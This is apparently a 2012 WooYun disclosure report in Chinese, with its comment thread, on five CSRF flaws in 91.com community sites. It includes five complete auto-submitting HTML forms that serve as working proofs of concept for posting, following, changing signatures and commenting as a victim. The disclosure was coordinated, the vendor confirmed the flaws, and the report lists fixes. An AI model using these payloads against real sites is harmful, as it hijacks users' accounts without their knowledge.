当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-08367

漏洞标题:福建网龙旗下某站CSRF礼包

相关厂商:福建网龙

漏洞作者: imlonghao

提交时间:2012-06-16 17:12

修复时间:2012-07-31 17:13

公开时间:2012-07-31 17:13

漏洞类型:CSRF

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-06-16: 细节已通知厂商并且等待厂商处理中
2012-06-18: 厂商已经确认,细节仅向厂商公开
2012-06-28: 细节向核心白帽子及相关领域专家公开
2012-07-08: 细节向普通白帽子公开
2012-07-18: 细节向实习白帽子公开
2012-07-31: 细节向公众公开

简要描述:

福建网龙旗下某处CSRF漏洞,可能导致蠕虫蔓延

详细说明:

在接受POST和GET的信息的时候,未对POST来路(Referer)进行验证,同时也没有在POST的信息中加token验证信息的正确性,导致漏洞产生。

漏洞证明:

【第一处】
漏洞地址:http://t.91.com/broadcast/add

<html>
<body>
<form id="imlonghao" name="imlonghao" action="http://t.91.com/broadcast/add" method="post">
<input type="text" name="tid" value="" />
<input type="text" name="content" value="XX" />
<input type="text" name="secret" value="0" />
<input type="text" name="video" value="" />
<input type="text" name="upimg" value="" />
<input type="submit" value="submit" />
</form>
<script>
document.imlonghao.submit();
</script>
</body>
</html>


可能会导致未经用户知情下在91社区中发布广播
=========华丽的分割线=========
【第二处】
漏洞地址:http://t.91.com/

<html>
<body>
<form id="imlonghao" name="imlonghao" action="http://t.91.com/" method="get">
<input type="text" name="controller" value="friend" />
<input type="text" name="action" value="follow" />
<input type="text" name="fid" value="145243793" />
<input type="submit" value="submit" />
</form>
<script>
document.imlonghao.submit();
</script>
</body>
</html>


可能会导致在用户为知情的情况下关注某人
=========华丽的分割线=========
【第三处】
漏洞地址:http://bbs.91.com/member/sign

<html>
<body>
<form id="imlonghao" name="imlonghao" action="http://bbs.91.com/member/sign" method="post">
<input type="text" name="user_sign" value="XXXX" />
<input type="submit" value="submit" />
</form>
<script>
document.imlonghao.submit();
</script>
</body>
</html>


可能会在用户未知情的情况下修改论坛签名档
(这个POST原本还有一个name=submit,后来居然冲突,以为删掉不行,谁知道还是可以POST的。。)
=========华丽的分割线=========
【第四处】
漏洞地址:http://pz.91.com/port/comment_action.php

<html>
<body>
<form id="imlonghao" name="imlonghao" action="http://pz.91.com/port/comment_action.php" method="post">
<input type="text" name="content" value="羡慕啊,那么多装备!!!" />
<input type="text" name="name" value="游客" />
<input type="text" name="vericode" value="" />
<input type="text" name="comment" value="http://pz.91.com/html/2012/24/15/18428/index.htm" />
<input type="text" name="title" value="魔域玩家大晒极品装备" />
<input type="text" name="backUrl" value="http://news.91.com/comment/ocommentsend.htm" />
<input type="text" name="url" value="#" />
<input type="text" name="defind" value="" />
<input type="text" name="charset_from" value="gbk" />
<input type="submit" value="submit" />
</form>
<script>
document.imlonghao.submit();
</script>
</body>
</html>


可能会在用户未知情的情况下,在引用了这个评论框的地址发布评论,影响范围大
=========华丽的分割线=========
【第五处】
漏洞地址:http://t.91.com/broadcast/rebroadcast

<html>
<body>
<form id="imlonghao" name="imlonghao" action="http://t.91.com/broadcast/rebroadcast" method="post">
<input type="text" name="ownermbrid" value="485158345" />
<input type="text" name="oldbrtid" value="631" />
<input type="text" name="curr_uid" value="485158345" />
<input type="text" name="curr_brtid" value="631" />
<input type="text" name="content" value="XX" />
<input type="submit" value="submit" />
</form>
<script>
document.imlonghao.submit();
</script>
</body>
</html>


可能会导致在用户未知情的情况下转发广播

修复方案:

检查POST来路Referer
在POST的信息中加token

版权声明:转载请注明来源 imlonghao@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2012-06-18 10:13

厂商回复:

感谢imlonghao提交的漏洞

最新状态:

暂无


漏洞评价:

评论

  1. 2012-06-16 18:15 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    我擦。人家刚注册就整这么大礼品

  2. 2012-06-16 18:26 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    @zeracker 哈哈,咱太对不起人家了,我这里有5个XSRF,哈哈,忙死程序员

  3. 2012-06-16 18:27 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    csrf

  4. 2012-06-16 19:30 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @imlonghao 伤不起

  5. 2012-06-16 21:43 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    = = 各种漏洞都来了。。 我在想。。要不要去找网龙的XSS

  6. 2012-06-16 21:56 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @gainover — — ,人家刚来,就这样热情,别把人家公司的人吓坏了

  7. 2012-06-16 21:59 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    @zeracker @xsser 到时乌云可以以这个对外宣传,注册乌云,1000多名白帽子为您解决安全问题,让你绝无后顾之忧!!哈哈哈!

  8. 2012-06-16 22:03 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @zeracker @imlonghao = = 。。有头脑。

  9. 2012-06-16 22:06 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    @gainover @zeracker 小二要小心啊,50分的差距。。

  10. 2012-06-16 22:36 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @imlonghao 俺还有2个洞。30分。再说,一切都都是浮云

  11. 2012-06-16 23:46 | pfdz ( 实习白帽子 | Rank:99 漏洞数:13 | Stay hungry. Stay foolish.)

    @imlonghao 是t社区的?

  12. 2012-06-17 05:41 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    @pfdz 我只逛乌云。

  13. 2012-06-17 14:00 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @imlonghao = = 他应该问的是,你的漏洞是不是t.91.com的吧?

  14. 2012-06-17 15:36 | pfdz ( 实习白帽子 | Rank:99 漏洞数:13 | Stay hungry. Stay foolish.)

    @gainover 说对了。。

  15. 2012-06-17 21:58 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    @pfdz @gainover 嗯

  16. 2012-06-18 10:22 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    @imlonghao 你太坏了 周末都不让程序员休息 你看看程序员已经多不容易了 呵呵

  17. 2012-06-18 22:12 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    让我情何以堪,给10RANK换了5个CSRF,2R一个?

  18. 2012-07-19 13:39 | LittlePig ( 路人 | Rank:5 漏洞数:2 | </html>)

    @imlonghao 下次拆开报。估计每个都至少拿5R~

  19. 2012-07-19 15:09 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    @LittlePig 会拉平均的亲。。

  20. 2012-07-19 21:21 | LittlePig ( 路人 | Rank:5 漏洞数:2 | </html>)

    @imlonghao ……好吧

  21. 2012-08-01 07:44 | 245661320 ( 路人 | Rank:1 漏洞数:3 | 永无边境的黑暗!)

    @gainover 你让人家情何以堪啊…